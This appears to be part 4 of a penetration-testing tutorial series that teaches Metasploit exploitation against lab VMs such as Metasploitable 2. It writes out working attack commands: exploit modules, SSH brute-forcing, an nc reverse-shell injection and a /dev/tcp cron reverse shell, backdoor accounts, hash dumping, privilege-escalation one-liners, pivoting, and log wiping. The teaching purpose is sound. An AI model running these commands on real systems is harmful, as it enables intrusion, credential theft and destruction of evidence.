Exploitation: From Vulnerability to Shell

The Hacker's Path: A 5-Part Series

Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Full Audit

In Parts 1-3, you built your toolkit. You can clone badges, map networks, capture handshakes, and identify every service running on a target. You see vulnerabilities everywhere now. But seeing a vulnerability and exploiting it are very different skills.

This is where it gets real. Today you'll learn to use the Metasploit Framework, the same tool used by professional penetration testers worldwide. You'll exploit your first vulnerability, establish persistence, escalate privileges, and learn to pivot through a network.

Part 1: Building Your Attack Lab

Before exploiting anything, you need targets. Real penetration testers use isolated lab environments with intentionally vulnerable machines. You'll do the same.

The Essential Lab Setup

What You'll Need

• Kali Linux VM - Your attack machine (from Part 3)
• Metasploitable 2 - Intentionally vulnerable Linux VM (SourceForge)
• Metasploitable 3 - Vulnerable Windows/Linux VM (GitHub)
• DVWA - Damn Vulnerable Web Application (GitHub)
• VulnHub VMs - CTF-style vulnerable machines (vulnhub.com)

Project: Lab Network Setup

Time: 45 minutes

1. Download Metasploitable 2 from SourceForge
2. Import into VirtualBox/VMware
3. Configure network: Set both Kali and Metasploitable to "Host-Only" or "Internal Network"
4. Boot Metasploitable (default login: msfadmin / msfadmin)
5. Note the IP address: ifconfig
6. From Kali, verify connectivity: ping METASPLOITABLE_IP
7. Run initial scan: sudo nmap -sV -sC METASPLOITABLE_IP

Verify: You should see dozens of open ports. Metasploitable is designed to be compromised.

Your nmap scan of Metasploitable should reveal services like FTP, SSH, Telnet, SMTP, HTTP, Samba, MySQL, PostgreSQL, and more, many running outdated, vulnerable versions. This is your playground.

Part 2: Metasploit Framework Fundamentals

Metasploit is not just a tool. It's an ecosystem. It contains thousands of exploits, payloads, auxiliary modules, and post-exploitation tools. Understanding its structure is essential.

Starting Metasploit

1# Initialize the database (first time only)
2sudo msfdb init
3
4# Start Metasploit console
5msfconsole
6
7# You'll see the Metasploit banner and prompt:
8msf6 >

The Metasploit Structure

Metasploit organizes everything into modules:

• Exploits - Code that takes advantage of vulnerabilities
• Payloads - Code that runs after exploitation (shells, meterpreter)
• Auxiliary - Scanners, fuzzers, and other utilities
• Post - Post-exploitation modules for persistence, pivoting
• Encoders - Obfuscate payloads to evade detection

1# Search for modules
2msf6 > search type:exploit platform:linux smb
3
4# Search by CVE
5msf6 > search cve:2017-0144
6
7# Search by name
8msf6 > search vsftpd
9
10# Get info about a module
11msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

The Exploitation Workflow

Every Metasploit exploitation follows the same pattern:

1. Select an exploit - use exploit/path/to/module
2. Set options - Target IP, ports, credentials
3. Select a payload - What runs after exploitation
4. Execute - exploit or run

Part 3: Your First Exploit

Let's exploit one of the most famous backdoors in history: the vsftpd 2.3.4 backdoor. In 2011, someone inserted a backdoor into the vsftpd source code. If you send a username ending with :), a shell opens on port 6200.

Metasploitable 2 runs this exact version.

1# Start Metasploit
2msfconsole
3
4# Search for the exploit
5msf6 > search vsftpd
6
7# Select the exploit
8msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
9
10# View required options
11msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
12
13# Set the target
14msf6 exploit(...) > set RHOSTS 192.168.56.101
15
16# Run the exploit
17msf6 exploit(...) > exploit
18
19# If successful:
20[*] Command shell session 1 opened
21[+] Got shell!
22
23# You now have a root shell on the target
24whoami
25root
26id
27uid=0(root) gid=0(root)

That's it. One vulnerable service, one exploit, root access. This is why keeping software updated matters.

Project: Exploit vsftpd Backdoor

Time: 15 minutes

Prerequisites: Metasploitable 2 running, Kali on same network

1. Verify FTP is running: nmap -sV -p 21 TARGET_IP
2. Launch msfconsole
3. Search, select, and configure the vsftpd exploit
4. Run the exploit
5. Once you have a shell, explore: cat /etc/shadow

Success criteria: You can read /etc/shadow, which only root can access.

Part 4: Understanding Payloads

A payload is what runs after the exploit succeeds. The basic shell we got above is simple, but Metasploit offers much more powerful options.

Payload Types

• Singles - Self-contained, one-shot payloads (add user, run command)
• Stagers - Small payloads that establish a connection, then download the main payload
• Stages - The main payload downloaded by the stager (Meterpreter)

1# List compatible payloads for current exploit
2msf6 exploit(...) > show payloads
3
4# Set a specific payload
5msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
6
7# Payload naming convention:
8# platform/arch/payload_type/connection_type
9# linux/x86/meterpreter/reverse_tcp
10# windows/x64/shell/bind_tcp

Reverse vs Bind Shells

• Reverse shell - Target connects back to you. Better for bypassing firewalls (outbound usually allowed).
• Bind shell - Target opens a port for you to connect. Easier to detect, often blocked by firewalls.

1# For reverse shells, you must set your IP
2msf6 exploit(...) > set LHOST YOUR_KALI_IP
3msf6 exploit(...) > set LPORT 4444
4
5# Metasploit starts a listener automatically when you exploit

Meterpreter: The Ultimate Payload

Meterpreter is Metasploit's most powerful payload. It runs entirely in memory (no files on disk), provides encrypted communication, and includes dozens of built-in commands for post-exploitation.

1# Meterpreter commands (once you have a session)
2meterpreter > sysinfo          # System information
3meterpreter > getuid           # Current user
4meterpreter > pwd              # Current directory
5meterpreter > ls               # List files
6meterpreter > download file    # Download file to Kali
7meterpreter > upload file      # Upload file to target
8meterpreter > shell            # Drop to system shell
9meterpreter > hashdump         # Dump password hashes
10meterpreter > screenshot       # Take screenshot
11meterpreter > keyscan_start    # Start keylogger
12meterpreter > keyscan_dump     # Dump keystrokes
13meterpreter > background       # Background this session

Part 5: More Exploitation Techniques

Exploiting Samba (SMB)

Metasploitable 2 runs a vulnerable version of Samba. This is similar to the infamous EternalBlue exploit used in WannaCry.

1# Search for Samba exploits
2msf6 > search type:exploit samba
3
4# The "username map script" vulnerability
5msf6 > use exploit/multi/samba/usermap_script
6msf6 exploit(...) > set RHOSTS TARGET_IP
7msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
8msf6 exploit(...) > set LHOST YOUR_IP
9msf6 exploit(...) > exploit
10
11[*] Command shell session 2 opened

Exploiting Weak Credentials

Not every compromise requires a software vulnerability. Weak passwords are everywhere.

1# SSH brute-force auxiliary module
2msf6 > use auxiliary/scanner/ssh/ssh_login
3msf6 auxiliary(...) > set RHOSTS TARGET_IP
4msf6 auxiliary(...) > set USERNAME root
5msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
6msf6 auxiliary(...) > set STOP_ON_SUCCESS true
7msf6 auxiliary(...) > run
8
9# For known credentials
10msf6 > use auxiliary/scanner/ssh/ssh_login
11msf6 auxiliary(...) > set USERNAME msfadmin
12msf6 auxiliary(...) > set PASSWORD msfadmin
13msf6 auxiliary(...) > run
14
15[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Web Application Exploitation

Metasploitable includes several vulnerable web applications. Let's exploit a PHP code injection.

1# First, browse to http://TARGET/mutillidae/
2# Find the "User Lookup" page (vulnerable to SQLi and code injection)
3
4# Use Metasploit's web exploits
5msf6 > search type:exploit php
6
7# Or exploit manually with command injection:
8# In vulnerable input field:
9; cat /etc/passwd
10; nc -e /bin/bash YOUR_IP 4444

Project: Exploit Three Different Services

Time: 60 minutes

Target: Metasploitable 2

1. Exploit vsftpd backdoor (FTP - port 21) and get root shell
2. Exploit Samba usermap_script (SMB - port 139/445) and get root shell
3. Crack SSH credentials (port 22) using auxiliary/scanner/ssh/ssh_login
4. Document each exploitation: module used, options set, result

Bonus: Explore the web applications on port 80 and find manual exploitation vectors.

Part 6: Post-Exploitation

Getting a shell is just the beginning. Real penetration tests require demonstrating what an attacker could do with that access. This is post-exploitation.

Information Gathering

1# From a Meterpreter session
2meterpreter > sysinfo
3Computer    : metasploitable
4OS          : Linux 2.6.24
5Architecture: i686
6Meterpreter : x86/linux
7
8# Network information
9meterpreter > ipconfig
10meterpreter > route
11meterpreter > arp

1# From a regular shell
2cat /etc/passwd       # All users
3cat /etc/shadow       # Password hashes (requires root)
4cat /etc/hosts        # Network mappings
5netstat -tulpn        # Open ports
6ps aux                # Running processes
7crontab -l            # Scheduled tasks

Credential Harvesting

1# Dump password hashes
2meterpreter > hashdump
3root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
4msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash

1# Or from shell
2cat /etc/shadow
3
4# Crack hashes offline with John the Ripper
5john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
6
7# Or hashcat (faster with GPU)
8hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt

Establishing Persistence

Persistence means maintaining access even after reboots or when your initial exploit vector is patched.

1# Add a new user with sudo access
2useradd -m -s /bin/bash hacker
3echo "hacker:password123" | chpasswd
4usermod -aG sudo hacker
5
6# Add SSH key for passwordless access
7mkdir /home/hacker/.ssh
8echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
9
10# Cron-based reverse shell (reconnects every minute)
11echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
12
13# Metasploit persistence module
14meterpreter > run persistence -h
15meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP

Persistence = Evidence

Every persistence mechanism leaves traces. In a real penetration test, you document what you could do, then clean up. Leaving backdoors on client systems is unprofessional and potentially illegal. In your lab, go wild, but understand the implications.

Part 7: Privilege Escalation

Often you gain initial access as a low-privileged user. Escalating to root/admin is usually required to achieve test objectives.

Linux Privilege Escalation

1# Current user context
2id
3whoami
4
5# SUID binaries (run as owner regardless of who executes)
6find / -perm -4000 -type f 2>/dev/null
7
8# World-writable directories
9find / -writable -type d 2>/dev/null
10
11# Sudo permissions
12sudo -l
13
14# Kernel version (for kernel exploits)
15uname -a
16
17# Running processes as root
18ps aux | grep root
19
20# Cron jobs
21cat /etc/crontab
22ls -la /etc/cron.*

Automated Enumeration Scripts

• LinPEAS - github.com/carlospolop/PEASS-ng
• LinEnum - github.com/rebootuser/LinEnum
• linux-exploit-suggester - GitHub

1# Upload and run LinPEAS
2# From Kali, host the script:
3python3 -m http.server 8000
4
5# From target:
6wget http://YOUR_IP:8000/linpeas.sh
7chmod +x linpeas.sh
8./linpeas.sh
9
10# LinPEAS highlights potential vectors in colors:
11# RED/YELLOW = Critical findings, likely exploitable

Common Linux Privesc Vectors

1# 1. Sudo misconfiguration
2sudo -l
3# If you see: (ALL) NOPASSWD: /usr/bin/vim
4sudo vim -c '!sh'
5# Instant root shell
6
7# 2. SUID binary exploitation
8# If /usr/bin/find has SUID bit:
9find . -exec /bin/sh -p \;
10
11# 3. Writable /etc/passwd
12# Generate password hash:
13openssl passwd -1 mypassword
14# Add to /etc/passwd:
15echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
16
17# 4. Cron job exploitation
18# If a cron runs a writable script as root:
19echo 'chmod +s /bin/bash' >> /path/to/cron/script
20# Wait for cron, then:
21/bin/bash -p
22# Root shell

Windows Privilege Escalation

If you're testing Windows targets (Metasploitable 3), the techniques differ:

1# From Meterpreter on Windows
2meterpreter > getuid
3Server username: VICTIM\lowpriv_user
4
5meterpreter > getsystem
6[+] ...got SYSTEM
7
8# If getsystem fails, try:
9meterpreter > run post/multi/recon/local_exploit_suggester
10
11# Or background and use specific exploit:
12meterpreter > background
13msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
14msf6 exploit(...) > set SESSION 1
15msf6 exploit(...) > exploit

Project: Escalate from User to Root

Time: 45 minutes

Scenario: You have SSH access to Metasploitable as msfadmin (non-root)

1. SSH to Metasploitable: ssh msfadmin@TARGET
2. Run id to confirm you're not root
3. Check sudo permissions: sudo -l
4. Look for SUID binaries: find / -perm -4000 2>/dev/null
5. Upload and run LinPEAS
6. Identify a privesc vector and exploit it

Goal: Obtain a root shell using something other than exploiting a network service.

Part 8: Pivoting

Pivoting is using a compromised system to attack other systems that aren't directly accessible from your attack machine. This is how attackers move laterally through networks.

The Pivot Scenario

Imagine this network:

• Your Kali: 192.168.1.100
• Compromised host: 192.168.1.50 (also connected to 10.0.0.0/24 internal network)
• Target: 10.0.0.10 (only accessible from 192.168.1.50)

You can't reach 10.0.0.10 directly. But through the compromised host, you can.

Metasploit Routing

1# After getting a Meterpreter session on the pivot host
2meterpreter > ipconfig
3# Shows two interfaces: 192.168.1.50 and 10.0.0.50
4
5meterpreter > run autoroute -s 10.0.0.0/24
6[+] Added route to 10.0.0.0/24 via session 1
7
8meterpreter > background
9
10# Now Metasploit routes 10.0.0.0/24 traffic through session 1
11msf6 > route print
12
13# Scan the internal network
14msf6 > use auxiliary/scanner/portscan/tcp
15msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
16msf6 auxiliary(...) > set PORTS 22,80,443,445
17msf6 auxiliary(...) > run
18
19# Exploit internal targets through the pivot
20msf6 > use exploit/windows/smb/ms17_010_eternalblue
21msf6 exploit(...) > set RHOSTS 10.0.0.10
22msf6 exploit(...) > exploit

SOCKS Proxy for Full Access

1# Set up a SOCKS proxy through Meterpreter
2msf6 > use auxiliary/server/socks_proxy
3msf6 auxiliary(...) > set SRVPORT 1080
4msf6 auxiliary(...) > run
5
6# Configure proxychains (/etc/proxychains4.conf)
7socks5 127.0.0.1 1080
8
9# Now any tool can access the internal network
10proxychains nmap -sT -Pn 10.0.0.10
11proxychains curl http://10.0.0.10
12proxychains ssh [email protected]

SSH Tunneling (Without Metasploit)

1# Dynamic port forwarding (SOCKS proxy)
2ssh -D 1080 user@pivot_host
3
4# Local port forwarding (specific port)
5ssh -L 8080:10.0.0.10:80 user@pivot_host
6# Now localhost:8080 reaches 10.0.0.10:80
7
8# Remote port forwarding (expose your service to internal network)
9ssh -R 4444:localhost:4444 user@pivot_host
10# Internal hosts can reach your port 4444 via pivot_host:4444

Part 9: Covering Tracks

Professional penetration testers document their access but clean up after themselves. Understanding how attackers cover tracks also helps you detect intrusions.

1# Clear bash history
2history -c
3cat /dev/null > ~/.bash_history
4
5# Clear auth logs (requires root)
6echo "" > /var/log/auth.log
7echo "" > /var/log/wtmp
8echo "" > /var/log/btmp
9
10# Remove specific log entries
11sed -i '/YOUR_IP/d' /var/log/auth.log
12
13# Timestomp (change file timestamps)
14touch -r /etc/passwd /path/to/your/file
15
16# Meterpreter
17meterpreter > clearev          # Clear Windows event logs
18meterpreter > timestomp file -m "01/01/2020 12:00:00"

In Real Engagements: Don't Do This

Professional pentesters document their access and report their findings. They don't hide them. Clearing logs destroys evidence that defenders need to understand the attack path. Only practice these techniques in your isolated lab environment.

The Hacker's Path

A 5-part series taking you from curious to capable.

Part 1: Introduction Part 2: Flipper Mastery Part 3: Kali Fundamentals Part 4: Exploitation ✓ Part 5: Full Audit

Part 4 Checklist

☐ Lab Setup: Metasploitable 2 running, isolated network configured

☐ Metasploit: Database initialized, basic navigation mastered

☐ First Exploit: vsftpd backdoor exploited, root shell obtained

☐ Multiple Vectors: Exploited FTP, SMB, and cracked SSH credentials

☐ Post-Exploitation: Password hashes dumped, system enumerated

☐ Privilege Escalation: Escalated from user to root without network exploit

☐ Pivoting: Understand autoroute and SOCKS proxy concepts

☐ Documentation: All exploits documented with steps and evidence

What's Next

You've learned to exploit vulnerabilities, escalate privileges, and pivot through networks. You've seen how quickly a single weakness becomes total compromise. You understand what professional penetration testers do.

In Part 5, we bring everything together. You'll conduct a complete security audit from start to finish:

• Scoping and rules of engagement
• Full reconnaissance methodology
• Systematic exploitation
• Comprehensive post-exploitation
• Professional reporting
• Remediation recommendations

Part 5 is the capstone. Everything you've learned across this series comes together into a real-world methodology you can use to assess the security of any network you're authorized to test.

You've learned the techniques. Now you learn the methodology. Part 5 turns skills into a complete penetration testing workflow.

See you in Part 5.